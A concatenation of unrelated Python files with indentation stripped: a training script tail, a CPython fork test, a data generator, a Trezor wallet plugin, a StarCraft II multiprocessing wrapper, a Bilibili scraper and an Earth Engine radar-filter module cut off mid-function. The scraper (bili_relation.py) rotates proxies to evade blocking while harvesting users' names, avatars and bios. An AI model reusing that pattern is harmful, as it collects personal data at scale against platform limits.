ani = animation.FuncAnimation(fig, animate, interval=1000)
plt.show()
dfa_train_thread.join()
bp_train_thread.join()
loss, accuracy = model_dfa.cost(*data.test_set())
print("\nResult DFA:\n------------------------------------")
print('loss on test set: {}'.format(loss))
print('accuracy on test set: {}'.format(accuracy))
loss, accuracy = model_bp.cost(*data.test_set())
print("\nResult BP:\n------------------------------------")
print('loss on test set: {}'.format(loss))
print('accuracy on test set: {}'.format(accuracy))
|
test_fork1.py
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import time
from test.fork_wait import ForkWait
from test.support import (run_unittest, reap_children, get_attribute,
import_module, verbose)
threading = import_module('threading')
# Skip test if fork does not exist.
get_attribute(os, 'fork')
class ForkTest(ForkWait):
def wait_impl(self, cpid):
for i in range(10):
# waitpid() shouldn't hang, but some of the buildbots seem to hang
# in the forking tests. This is an attempt to fix the problem.
spid, status = os.waitpid(cpid, os.WNOHANG)
if spid == cpid:
break
time.sleep(1.0)
self.assertEqual(spid, cpid)
self.assertEqual(status, 0, "cause = %d, exit = %d" % (status&0xff, status>>8))
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(0)
else:
if verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(0)
self.wait_impl(pid)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def test_main():
run_unittest(ForkTest)
reap_children()
if __name__ == "__main__":
test_main()
|
data_generator.py
|
import os
import cv2
import numpy as np
import random
import threading, queue
import argparse
from tqdm import tqdm
from fragment_generator import generate_fragment, positive_trait, negative_trait
DIMENSION_X, DIMENSION_Y = 224, 224
# write images asynchronously to disk to unblock computation
to_write = queue.Queue(maxsize=10000)
def writer():
"""
Writer for the writer thread that saves generated fragments to disk
"""
# Call to_write.get() until it returns None
for write_task in iter(to_write.get, None):
dirname = os.path.dirname(write_task[0])
os.makedirs(dirname, exist_ok=True)
success = cv2.imwrite(write_task[0], write_task[1])
if not success:
raise RuntimeError(f"Could not save generated sample to {write_task[0]}")
def write_fragments(trait_generator, amount, path):
"""
Generates fragments with the traits given by the given trait generator and saves them to the given path
"""
# existing_files = [os.path.join(root, name)
# for root, dirs, files in os.walk(path)
# for name in files if name.endswith(IMAGE_FORMATS)]
existing_files = []
for i in tqdm(range(len(existing_files), amount), total=amount - len(existing_files), ascii=True):
traits = trait_generator()
fragment = generate_fragment(traits, (DIMENSION_X, DIMENSION_Y))
file_path = path + "/{}.png".format(i)
write_task = (file_path, fragment)
to_write.put(write_task)
if __name__ == '__main__':
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--positive", default=100, type=int,
help="Amount of positive fragments that should be generated (default is 100).")
ap.add_argument("-n", "--negative", default=100, type=int,
                    help="Amount of negative fragments that should be generated (default is 100).")
ap.add_argument("-pp", "--pospath", default="./generated/positive",
help="Path to which positive fragments will be saved.")
ap.add_argument("-np", "--negpath", default="./generated/negative",
help="Path to which negative fragments will be saved.")
args = vars(ap.parse_args())
positive_path = args['pospath']
negative_path = args['negpath']
positive_amount = args['positive']
negative_amount = args['negative']
# start the writer for the fragments
threading.Thread(target=writer).start()
write_fragments(positive_trait, positive_amount, positive_path)
write_fragments(negative_trait, negative_amount, negative_path)
print("Generation is done, waiting for writing...")
# enqueue None to instruct the writer thread to exit
to_write.put(None)
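# A hedged sketch (not the original flow): keeping a handle on the writer
# thread allows an explicit join, so the script only exits once every queued
# cv2.imwrite call has completed. The None sentinel already tells writer() to stop.
#
# writer_thread = threading.Thread(target=writer)
# writer_thread.start()
# ... generate fragments as above ...
# to_write.put(None)    # sentinel consumed by iter(to_write.get, None)
# writer_thread.join()  # wait until all pending images are on disk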
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from commerciumelectro.util import bfh, bh2u
from commerciumelectro.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from commerciumelectro.i18n import _
from commerciumelectro.plugins import BasePlugin
from commerciumelectro.transaction import deserialize
from commerciumelectro.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never return if a KeepKey is plugged in
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.daemon = True
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the initialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey('standard', bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def commerciumelectro_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.commerciumelectro_tx_to_txtype(tx)
|
msg_multiproc.py
|
import numpy as np
from multiprocessing import Pipe, Process
from . import Env
# LISTEN is only needed on Windows (and potentially macOS), since SC2 on Linux is headless
START, STEP, LISTEN, RESET, STOP, DONE = range(6)
class MsgProcEnv(Env):
def __init__(self, env):
super().__init__(env.id)
self._env = env
self.conn = self.w_conn = self.proc = None
def start(self):
self.conn, self.w_conn = Pipe()
self.proc = Process(target=self._run)
self.proc.start()
self.conn.send((START, None))
def step(self, act):
self.conn.send((STEP, act))
def listen(self):
self.conn.send((LISTEN, None))
def reset(self):
self.conn.send((RESET, None))
def stop(self):
self.conn.send((STOP, None))
def wait(self):
return self.conn.recv()
def obs_spec(self):
return self._env.obs_spec()
def act_spec(self):
return self._env.act_spec()
def _run(self):
while True:
msg, data = self.w_conn.recv()
if msg == START:
self._env.start()
self.w_conn.send(DONE)
elif msg == STEP:
obs, rew, done = self._env.step(data)
self.w_conn.send((obs, rew, done))
elif msg == LISTEN:
received_msg = self._env.listen_to_chat_channel()
self.w_conn.send(received_msg)
elif msg == RESET:
obs = self._env.reset()
self.w_conn.send((obs, -1, -1))
elif msg == STOP:
self._env.stop()
self.w_conn.close()
break
class MsgMultiProcEnv(Env):
"""
Parallel environments via multiprocessing + pipes
"""
def __init__(self, envs):
super().__init__(envs[0].id)
self.envs = [MsgProcEnv(env) for env in envs]
def start(self):
for env in self.envs:
env.start()
self.wait()
def step(self, actions):
for idx, env in enumerate(self.envs):
env.step([a[idx] for a in actions])
return self._observe()
def listen(self):
for idx, env in enumerate(self.envs):
env.listen()
# only collect the non-empty messages
received_message = [message for message in self.wait() if message]
# TODO: add better logic for filtering useless messages
# only return the latest
if len(received_message) > 0:
return received_message[0]
def reset(self):
for e in self.envs:
e.reset()
return self._observe()
def _observe(self):
obs, reward, done = zip(*self.wait())
# n_envs x n_spaces -> n_spaces x n_envs
obs = list(map(np.array, zip(*obs)))
return obs, np.array(reward), np.array(done)
def stop(self):
for e in self.envs:
e.stop()
for e in self.envs:
e.proc.join()
def wait(self):
return [e.wait() for e in self.envs]
def obs_spec(self):
return self.envs[0].obs_spec()
def act_spec(self):
return self.envs[0].act_spec()
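# Hedged usage sketch (assumes an Env subclass `MyEnv` that is not part of this
# module): each call below maps to one (msg, data) tuple sent over the pipe to
# the worker process defined in MsgProcEnv._run.
#
# envs = [MyEnv(i) for i in range(4)]      # hypothetical Env instances
# venv = MsgMultiProcEnv(envs)
# venv.start()                             # START -> each worker replies DONE
# obs, rew, done = venv.step(actions)      # STEP  -> actions: one sequence per action space, indexed by env
# obs, rew, done = venv.reset()            # RESET -> fresh observations, reward/done set to -1
# venv.stop()                              # STOP  -> workers close their pipes and join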
|
bili_relation.py
|
import os
import time
import json
import redis
import requests
import signal
import random
from multiprocessing import Process, Pool
from bos_filter import RedisDB, BosFilter
from bili_mongo import BosMongo
rdb = RedisDB()
mbd = BosMongo()
bf = BosFilter()
r = redis.Redis(host="127.0.0.1")
redis_key = "bili_relation_list"
redis_set = "bili_relation_set"
def parse(pid, url, proxies):
response = requests.get(url, proxies=proxies)
ret_dict = json.loads(response.text)
status_code = ret_dict.get('code')
if not status_code:
if 'data' in ret_dict.keys():
info_dict = ret_dict.get('data')
total = info_dict.get('total')
focus_list = info_dict.get('list')
user_id = response.url.split('vmid=')[1].split('&')[0]  # str.strip() would treat the URL prefix as a character set
for focus_item in focus_list:
focus_info = dict()
focus_info['total'] = total
focus_info['user_id'] = user_id
focus_info['focus_id'] = focus_item.get('mid')
focus_info['focus_name'] = focus_item.get('uname')
focus_info['focus_face'] = focus_item.get('face')
focus_info['introduction'] = focus_item.get('sign')
# print("test:", focus_info)
# add the followed user's id to the set of ids waiting to be crawled
r.sadd(redis_set, focus_info.get('focus_id'))
mbd.execute('relation', focus_info)
print(f"进程--{pid}--当前抓取:用户-{user_id}-完成")
def get_proxy(index):
proxy_url = 'http://ip.ipjldl.com/index.php/api/entry?method=proxyServer.hdtiqu_api_url&packid=0&fa=0&groupid=0&fetch_key=&time=100&qty=10&port=1&format=json&ss=5&css=&dt=0&pro=&city=&usertype=4'
try:
response = requests.get(proxy_url)
response = response.text
result = json.loads(response)
proxy_list = result.get('data')
proxy_count = len(proxy_list)
num = random.randint(0, proxy_count - 1)  # randint is inclusive on both ends
ip = proxy_list[num].get('IP')
port = proxy_list[num].get('Port')
proxy = 'https://{}:{}'.format(ip, port)
return proxy
except Exception as e:
print(f"{index}----failed to fetch a proxy, retrying in 3 seconds...")
time.sleep(3)
return get_proxy(index)
def run(index):
proxy = get_proxy(index)
proxies = {
"http": proxy,
"https": proxy,
}
k = 0
while True:
url = rdb.r.lpop(redis_key)
if url is None:
break
try:
parse(index, url, proxies)
except Exception as e:
k += 1
proxy = get_proxy(index)
proxies = {
"http": proxy,
"https": proxy,
}
print(f"{index}----new_proxy:{proxies}")
parse(index, url, proxies)
print("over")
if __name__ == '__main__':
for i in range(20):
p = Process(target=run, args=(i,))
p.start()
print("主进程ouer!!!")
|
area.py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 20 10:48:31 2021
@author: jon-f
"""
import os
import subprocess
import threading
from datetime import date
import glob
import time
import math
from IPython.display import display
import datetime as dt
import pytz
import matplotlib.pyplot as plt
import numpy as np
import folium
import ee
from google.cloud import storage
def auth():
"""
Authenticates the user to Google Earth Engine and initializes the library.
Parameters:
None.
Returns:
client (storage.Client): A Client object that can be used to access \
Google Cloud Storage data.
"""
while True:
try:
for file in os.listdir():
if file == 'service_account.txt':
service_account = open(file).read()
break
if not os.path.exists('service_account.txt'):
service_account = input("Enter your service account email: ")
json_file = ''
for file in os.listdir():
if file.endswith('.json'):
json_file = file
break
if service_account and json_file:
credentials = ee.ServiceAccountCredentials(service_account, json_file)
ee.Initialize(credentials=credentials)
client_obj = storage.Client(credentials=credentials)
break
else:
raise KeyError("The JSON private key file could not be found \
or was inconsistent with the service account. \
Please place only one key in the current file directory.")
break
except KeyboardInterrupt:
raise KeyboardInterrupt('Program stopped by user.')
return client_obj
client = auth()
# reducer
def divider(coordinates):
"""
(For internal use)
Divides a closed rectangle into one smaller rectangle per corner; reduce()
calls this repeatedly until every piece is under the area threshold.
"""
assert np.array(coordinates).shape[1] == 2, "Coordinates of wrong size [error]"
def checkifrect(nparray):
pone, ptwo, pthree, pfour, pfive = nparray
v1_mag = np.linalg.norm(np.subtract(pthree, pone))
v2_mag = np.linalg.norm(np.subtract(pfour, ptwo))
return bool(np.abs(v1_mag-v2_mag) < 0.001)
assert checkifrect(coordinates), "The input geometry must be rectangular"
x_data = coordinates[:, 0]
y_data = coordinates[:, 1]
(c_x, c_y) = (np.sum(x_data[:-1])/np.size(x_data[:-1]),
np.sum(y_data[:-1])/np.size(y_data[:-1]))
new_polygons = []
corners = len(coordinates)-1
for i in range(corners):
polygon = [[x_data[i], y_data[i]],
[(x_data[i%corners]+x_data[(i+1)%corners])/2,
(y_data[i%corners]+y_data[(i+1)%corners])/2],
[c_x, c_y],
[(x_data[i]+x_data[(i-1)%corners])/2,
(y_data[i]+y_data[(i-1)%corners])/2],
[x_data[i], y_data[i]]]
new_polygons.append(polygon)
return new_polygons
def rect_area(coordinates):
"""
(For internal use)
Calculates the area of a rectangle using Lat_long area.
"""
try:
assert np.array(coordinates).shape[1] == 2
p1, p2, p3, p4, p5 = coordinates
except:
coordinates = primer(coordinates)[0]
p1, p2, p3, p4, p5 = coordinates
area = np.abs(np.linalg.norm(p2-p1)*np.linalg.norm(p4-p1))
return area
def primer(area):
l1 = [area,]
l2 = np.array(l1)
l3 = np.reshape(l2,(l2.shape[0], l2.shape[2], 2))
return l3
def reduce(listOfCoords):
"""
Divides a rectangle defined by closed coordinates into smaller rectangles.
Parameters:
listOfCoords (list): A list of coordinates in the form \
[[[x1, y1], [x2, y2], ..., [x1, y1]], ...]. The \
coordinates must define a rectangular shape.
Returns:
new_polygons (list): A list of new rectangles in the form \
[coordinates1, coordinates2, ..., coordinatesn], where n is \
the length of coordinates minus 1 (the number of corners)
"""
def all_good(listOfCoords):
flag = True
for coords in listOfCoords:
if rect_area(coords) > 0.1: # arbitrary threshold value
flag = False
break
return flag
try:
listOfCoords[1]
except:
listOfCoords = primer(listOfCoords)
assert listOfCoords.shape[2] == 2, "wrong size error"
if all_good(listOfCoords):
return listOfCoords
newlistOfCoords = []
for coords in listOfCoords:
newlistOfCoords = newlistOfCoords + divider(coords)
newlistOfCoords = np.squeeze(np.array(newlistOfCoords))
return reduce(listOfCoords=newlistOfCoords)
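# Hedged example of the divider/reduce recursion above: a closed rectangle is
# split into four sub-rectangles per pass until every piece passes the area
# check in all_good(). The coordinates below are made up for illustration.
#
# rect = [[[0.0, 0.0], [1.0, 0.0], [1.0, 1.0], [0.0, 1.0], [0.0, 0.0]]]
# pieces = reduce(rect)                       # numpy array of smaller closed rectangles
# print(len(pieces), "sub-rectangles")        # 16 for a 1x1 degree rectangle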
def geoJSONer(coords):
try:
coords = coords.tolist()
except:
pass
geoJSON = {
"type": "FeatureCollection",
"features": [
{
"type": "Feature",
"properties": {},
"geometry": {
"type": "Polygon",
"coordinates": [
coords
]
}
}
]
}
return geoJSON
def degeoJSONer(geoJSON):
coords = geoJSON['features'][0]['geometry']['coordinates']
return coords
# filters
def lowpass1(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
row = [1/9, 1/9, 1/9]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[row, row, row])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def lowpass2(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
rowA = [0, 1/8, 0]
rowB = [1/8, 1/2, 1/8]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[rowA, rowB, rowA])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def highpass1(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
rowA = [-1/8, 1/8, -1/8]
rowB = [1/8, 0, 1/8]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[rowA, rowB, rowA])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def highpass2(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
system_index = system_index.replace('/', '__')
rowA = [0, -1/4, 0]
rowB = [-1/4, 1, -1/4]
kernel = ee.Kernel.fixed(width=3, height=3, weights=[rowA, rowB, rowA])
n_image = image.convolve(kernel)
return n_image.set('system:index', system_index)
def frost(image):
try:
system_index = image.get('system:index').getInfo()
system_index + ''
except:
system_index = image.get('system:id').getInfo()
system_index = system_index.replace('/', '__')
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames = image.bandNames()
image = image.select(bandNames)
nfrost = 7 # kernel size
D = 2 # frost damping factor
kernel = np.zeros((nfrost, nfrost))
center = (nfrost-1)/2
for i in range(nfrost):
for j in range(nfrost):
kernel[i, j] = ((center-i)**2 + (center-j)**2)**(1/2)
distArr = ee.Array(kernel.tolist())
distArrImg = ee.Image(distArr)
weights = ee.List.repeat(ee.List.repeat(1,nfrost),nfrost)
kernel = ee.Kernel.fixed(nfrost,nfrost, weights, center, center)
mean = image.select(bandNames).reduceNeighborhood(ee.Reducer.mean(), kernel);
var = image.select(bandNames).reduceNeighborhood(ee.Reducer.variance(), kernel);
B = var.divide(mean.multiply(mean)).multiply(D)
eNegB = B.multiply(-1).exp()
Bneighbor = eNegB.neighborhoodToArray(kernel)
W = Bneighbor.pow(distArrImg)
WSum = W.arrayReduce(ee.Reducer.sum(), [0,1]).arrayFlatten([['coefficientx'], ['coeffecienty']])
imageNeighbor = image.select(bandNames).neighborhoodToArray(kernel)
imageNeighborW = imageNeighbor.multiply(W)
n_image = imageNeighborW.arrayReduce(ee.Reducer.sum(), [0, 1]).arrayFlatten([['frostx'], ['frosty']]).divide(WSum)
return n_image.rename(bandNames).set('system:index', system_index)
def gammamap(image):
"""
Gamma Maximum a-posterior Filter applied to one image. It is implemented as \
described in Lopes A., Nezry, E., Touzi, R., and Laur, H., 1990. \
Maximum A Posteriori Speckle Filtering and First Order texture Models \
in SAR Images. International Geoscience and Remote Sensing Symposium.
Parameters
----------
image : ee.Image
Image to be filtered
Returns
-------
ee.Image
Filtered Image
"""
enl = 5
KERNEL_SIZE=5
try:
bandNames = image.bandNames().remove('angle')
except:
bandNames= image.bandNames()
#local mean
reducers = ee.Reducer.mean().combine( \
reducer2= ee.Reducer.stdDev(), \
sharedInputs= True
)
stats = (image.select(bandNames).reduceNeighborhood( \
reducer= reducers, \
kernel= ee.Kernel.square(KERNEL_SIZE/2,'pixels'), \
optimization= 'window'))
meanBand = bandNames.map(lambda bandName: ee.String(bandName).cat('_mean'))
stdDevBand = bandNames.map(lambda bandName: ee.String(bandName).cat('_stdDev'))
z = stats.select(meanBand)
sigz = stats.select(stdDevBand)
#local observed coefficient of variation
ci = sigz.divide(z)
#noise coefficient of variation (or noise sigma)
cu = 1.0/math.sqrt(enl)
#threshold for the observed coefficient of variation
cmax = math.sqrt(2.0) * cu
cu = ee.Image.constant(cu)
cmax = ee.Image.constant(cmax)
enlImg = ee.Image.constant(enl)
oneImg = ee.Image.constant(1)
twoImg = ee.Image.constant(2)
alpha = oneImg.add(cu.pow(2)).divide(ci.pow(2).subtract(cu.pow(2)))
#Implements the Gamma MAP filter described in equation 11 in Lopez et al. 1990
q = image.select(bandNames).expression(
'z**2 * (z * alpha - enl - 1)**2 + 4 * alpha * enl * b() * z',
{ 'z': z, 'alpha':alpha,'enl': enl})
rHat = z.multiply(alpha.subtract(enlImg).subtract(oneImg))\
.add(q.sqrt()).divide(twoImg.multiply(alpha))
# if ci <= cu then it's a homogeneous region ->> boxcar filter
zHat = (z.updateMask(ci.lte(cu))).rename(bandNames)
# if cmax > ci > cu then it's a textured medium ->> apply Gamma MAP filter
rHat = (rHat.updateMask(ci.gt(cu)).updateMask(ci.lt(cmax))).rename(bandNames)
